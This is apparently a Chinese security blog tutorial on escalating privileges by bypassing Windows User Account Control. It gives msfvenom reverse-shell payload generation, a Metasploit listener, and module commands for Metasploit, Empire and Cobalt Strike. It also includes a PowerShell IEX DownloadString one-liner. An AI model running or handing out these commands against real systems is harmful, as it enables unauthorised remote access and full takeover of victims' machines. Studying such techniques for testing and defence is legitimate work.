bypassUAC提权

最新推荐文章于 2024-08-09 07:13:14 发布
最新推荐文章于 2024-08-09 07:13:14 发布
阅读量1.5k 收藏 7
点赞数 1
分类专栏: Windows系统安全 内网渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/117674749
版权

目录

Windows UAC概述

用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。
使用UAC,应用程序和任务总是在非管理员帐户的安全上下文中运行,但管理员专门给系统授予管理员级别的访问权限时除外。UAC会阻止未经授权应用程序的自动安装,防止无意中对系统设置进行更改。
用户帐户控制(UAC)是新版Windows的核心安全功能,也是其最常被人误解的众多安全功能当中的一种。

UAC结构图

在这里插入图片描述

UAC组件描述

用户
用户执行需要权限的操作
ShellExecuteCreateProcess
CreateProcess
系统
应用程序信息服务
提升ActiveX安装
检查UAC滑块水平
启用安全桌面
创建进程
应用程序兼容性
安装程序检测
内核
虚拟化
文件系统和注册表

UAC滑块设置

UAC有一个滑块可以从四个级别的通知中选择。
总是通知将:
当程序试图安装软件或更改您的计算机时通知。
当您更改Windows设置时通知。
只有当程序试图更改我的电脑时才通知我:
当程序试图安装软件或更改您的计算机时通知。
当您更改Windows设置时,不会通知。
只有当程序试图更改我的电脑时才通知我(不要使我的桌面变暗):
当程序试图安装软件或更改您的计算机时通知。
当您更改Windows设置时,不会通知。
永远不要通知(禁用UAC提示):
当程序试图安装软件或更改您的计算机时,不会通知。
当您更改Windows设置时,不会通知。

UAC可授权的控制

UAC需要授权包括:

  1. 配置Windows Update
  2. 增加或删除用户账户
  3. 改变用户的账户类型
  4. 改变UAC设置
  5. 安装ActiveX
  6. 安装或移除程序
  7. 安装设备驱动程序
  8. 设置家长控制
  9. 将文件移动或复制到Program Files或Windows目录
  10. 查看其他用户文件夹

漏洞提权

UAC提权之MSF

1、bypassuac提权

提权前提在已经获得一个meterpreter的情况下,进行bypassuac提权,而且确保当前用户是在管理员用户组的情况下。

生成一个木马文件来获取一个meterpreter
操作如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 -f exe>payload.exe

在这里插入图片描述
操作如下:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.x.x
set LPORT 4444
run
background

在这里插入图片描述
利用exploit/windows/local/bypassuac模块提权
操作如下

use exploit/windows/local/bypassuac
set session 1
run
getuid
getsystem
getuid

在这里插入图片描述

2、bypassuac_eventvwr提权

也可以用exploit/windows/local/bypassuac_eventvwr模块提权bypassuac事件查看器。
在这里插入图片描述
Search bypass找一些可以利用的,我这里目标机是win7旗舰x64。

3、RunAs提权

Runas提权会创建一个执行文件,会在目标机上弹出一个uac的对话框,点击是回弹一个shell,可以进行getsystem提权。
在这里插入图片描述
弹出对话框点击“是”则会反弹shell,进行提权操作。
在这里插入图片描述
在这里插入图片描述

UAC提权之Empire

已经有一个listener了需要获取一个agents shell
在这里插入图片描述
在这里插入图片描述
通过meterpreter上传并执行,执行完成后桌面上就会消失。
在这里插入图片描述
在这里插入图片描述
返回一个agents shell
在这里插入图片描述
搜索模块searchmodule会有很多相关的
在这里插入图片描述

1、bapassuac模块提权

操作如下:

usemoudle privesc/bypassuac
info
set Listener hack
execute

在这里插入图片描述
提权成功。
在这里插入图片描述

2、bapassuac_wscript模块提权

此模块只用于Windows7系统,使用Windows系统下的wscript.exe执行payload进行绕过uac提权。
操作如下:

usemoudle privesc/bypassuac_wscript
info
set Listener hack
execute

在这里插入图片描述

UAC提权之CS

前提是获得一个会话的情况下进行提权。
在这里插入图片描述
右击目标选择执行-提权弹出一个对话框,选择“监听器”-“expolit”为uac-token-duplication。
在这里插入图片描述
在这里插入图片描述
提权成功
在这里插入图片描述

UAC提权之powershell

在获取一个meterpreter的情况下,上传nishang的PsUACme.ps1脚本。
在这里插入图片描述

powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('C:\Users\Admin\Desktop\Invoke-PsUACme.ps1'); Invoke-PsUACme -method oobe -verbose

运行完会弹出一个新的高权限窗口。
在这里插入图片描述
可以结合CS使用powershell,同样也可以在目标机弹窗。
在这里插入图片描述
在这里插入图片描述

参考文献

https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works

bye_X
关注
专栏目录
BypassUAC-权限提升
weixin_45701675的博客
11-19 1305
什么是UAC?如何设置? UAC(UserAccount Control,用户账户控制) 简言之就是在Vista及更高版本中通过弹框进一步让用户 确认是否授权当前可执行文件来达到阻止恶意程序的目的。 可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级) 参考:http://cn-sec.com/archives/116488.html #BypassUAC提权?常见绕过项目? 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC 绕过项目:M
钓鱼网站+bypassuac提权
Jinmindong
02-20 1497
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Bypass UAC 提权
LYSM
06-30 3877
背景 UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。 UAC需要授权的动作包括:配置Windows Update;增加或删除用户账户;改变用户的账户类型;改变UAC设置;安装ActiveX;安装或移除程序;安装设备驱动程序;设置家长控制;将文件移动或复制到
UACME 项目使用教程
最新发布
gitblog_00154的博客
08-09 825
UACME 项目使用教程 UACMEDefeating Windows User Account Control项目地址:https://gitcode.com/gh_mirrors/ua/UACME 1. 项目的目录结构及介绍 UACME 项目的目录结构如下: UACME/ ├── Akagizuo/ ├── COMHijack/ ├── DefenderExclusions/ ├── Doc...
bypassuac提权
qq_46258964的博客
06-20 1387
UAC介绍 UAC是微软为提高系统安全性中引入的技术。 UAC要求用户在执行可能影响计算机运行的操作或者在进行可能影响其他用户的设置之前, 拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证, 以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行修改。 微软设置的安全控制策略,分为高、中、低三个等级。 高等级的进程有管理员权限;中等级的进程有普通管理员权限;低等级的进程,权限是有限的,以保证系统在受到安全威胁时造成的损害最小。uac绕过 为了远程执行目标的ex
PASS UAC
冷风
11-18 1193
据牛淫女X说 NTFS特性 目录连接 可以以主次关系 用有签名的文件绑定无签名文件执行没时间仔细研究把大概记录一下备忘http://hi.baidu.com/flowercode/blog/item/fdad0ffa5865fe1aa9d311ef.htmlhttp://www.debugman.com/read.php?tid=2082&fpage=4http://www.bitsum.com/
通过Bypass UAC进行权限提升
内心不种满鲜花就会长满杂草
01-30 4410
用户账户控制(User Account control,UAC)是windows系统采用的一种控制机制,可以阻止自动安装未经授权的应用 并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制程序使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授权管理员级别的权限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须征得用户同意。UAC限制所有用户包括非RID500的管理员用户使用标准用户登录到他们的计算机,并在标准用户的安全性上下文中访问资源和运行应用。
精选_Bypass UAC 提权小结_源码打包
03-10
**Bypass UAC 提权小结** 用户账户控制(User Account Control,UAC)是微软在Windows Vista及后续操作系统中引入的一项安全特性,用于保护系统免受恶意软件的影响。它通过要求用户对需要管理员权限的操作进行确认...
Windows提权---第三方软件提权Bypass UAC提权
qq_40012781的博客
07-03 1917
第三方软件提权Bypass UAC提权
155.网络安全渗透测试—[Cobalt Strike系列]—[权限提升/BypassUAC提权/MS14-058提权/PowerUp提权/MSF提权]
qwsn
03-28 1173
一、权限提升 1、BypassUAC 提权 2、CVE-2014-4113(MS14-058)提权 3、powerup 提权:服务权限配置不当 4、MSF 利用服务权限配置不当模块提权 二、提权测试 1、实验环境 2、BypassUAC提权 2、MS14-058提权 3、powerup提权:服务配置不当
bypassUAC
火柴人的博客
05-17 262
https://www.anquanke.com/post/id/163222 我有个bypassUAC想给你讲
bypassuac:绕过uac
05-13
bypassuac ###example: bypassuac.exe "/c echo 1 >> c:\\3333" bypassuac.exe "/c powershell -c "aaaa" bypassuac,exe system ###题外话: 只能编译成32位. 多重指针写起来太麻烦,所以patch peb用内嵌汇编写的. 想编译成x64的话得改改代码. 参考了老外的项目: patch peb后,然后调用IFileOperation对象的某个接口的shellexecute函数,原因在老外的文章里写了. 具体细节看代码吧. 适用于Win7-Win10 加了一段getsystem的代码,原理跟msf里的getsystem一样.
bypass UAC 提权
a439017985的博客
02-24 1893
在meterpreter下 getuid sysinfo 查看系统版本及相关信息(多少位) background search bypassuac   use exploit/windows/local/bypassuac_eventvwr   此exploit对win10 64位有效 injection的对win10 32位的有效,对64位的无效 set session ex
关于bypassUAC
qq_63217130的博客
01-23 588
原理:注册表中的一些程序,在运行时,由于被加入白名单了,这些程序要么本身具有管理员权限,要么可以直接获取管理员权限,那么可以点击运行后静默为管理员权限,不需要弹出uac的窗口,那么攻击者可以通过修改注册表中的这些uac白名单的程序,将其换成一个恶意的程序那么即可管理员权限运行绕过uac认证。关于DLL劫持还有一个需要注意的,当你劫持了一个DLL之后,那么原先的程序就不能正常运行了,甚至可能会损坏系统,为了防止这种事故发生,一般会在恶意的dll中去加载真正的dll,这样就不会影响程序的正常运行了。
Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权
2401_84300239的博客
04-28 178
这里的图片我借用一下其它博客的,由于我自己电脑以及其它电脑,虚拟机都没有这样的路径。次序执行。
嘿咻Win7'UAC
blackbean的专栏
09-24 518
fireworm同学的翻译: 原文在http://www.pretentiousname.com/misc/win7_uac_whitelist2.html我只翻译了其中关于原理的一小部分,有兴趣的可以自己去看看。 Win7的UAC与Vista不同,鉴于前作糟糕的设计,为了减
提权技术之Bypass UAC
weixin_42071117的博客
10-19 904
// UAC(用户账户控制)是微软在Windows VISTA以后版本中引入的一种安全机制。通过UAC,应用程序和任务始终在非管理员权限下的安全上下文中运行。 // 除非特别授予管理员权限。UAC可以阻止未经授权的应用程序自动进行安装,并防止无意地更改系统设置。 // UAC需要授权的动作包括:配置Windows Update、增加或删除用户账户、更改用户账户的类型、改变UAC设置、安装ActiveX、安装或移除程序、安装设备驱动程序、 // 设置家长控制、将文件移动或复制到Program File或Wi
ByPass UAC
yeanhoo的博客
09-24 1251
ByPass UAC 白名单程序 Bypass UAC 有些系统程序是直接获取管理员权限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe等.这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC提权操作 利用CompMgmtLauncher.exe、该程序在启动时会查询注册
bypassuac_dotnet_profiler提权模块怎么用
02-21
这是一个提权模块,它可以用来绕过 UAC(用户帐户控制),通过利用 .NET 框架的 profiler API 来提升进程的权限级别。使用此模块的首先需要确保已经安装了.NET Framework,然后可以使用任何.NET 可执行程序来运行它。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值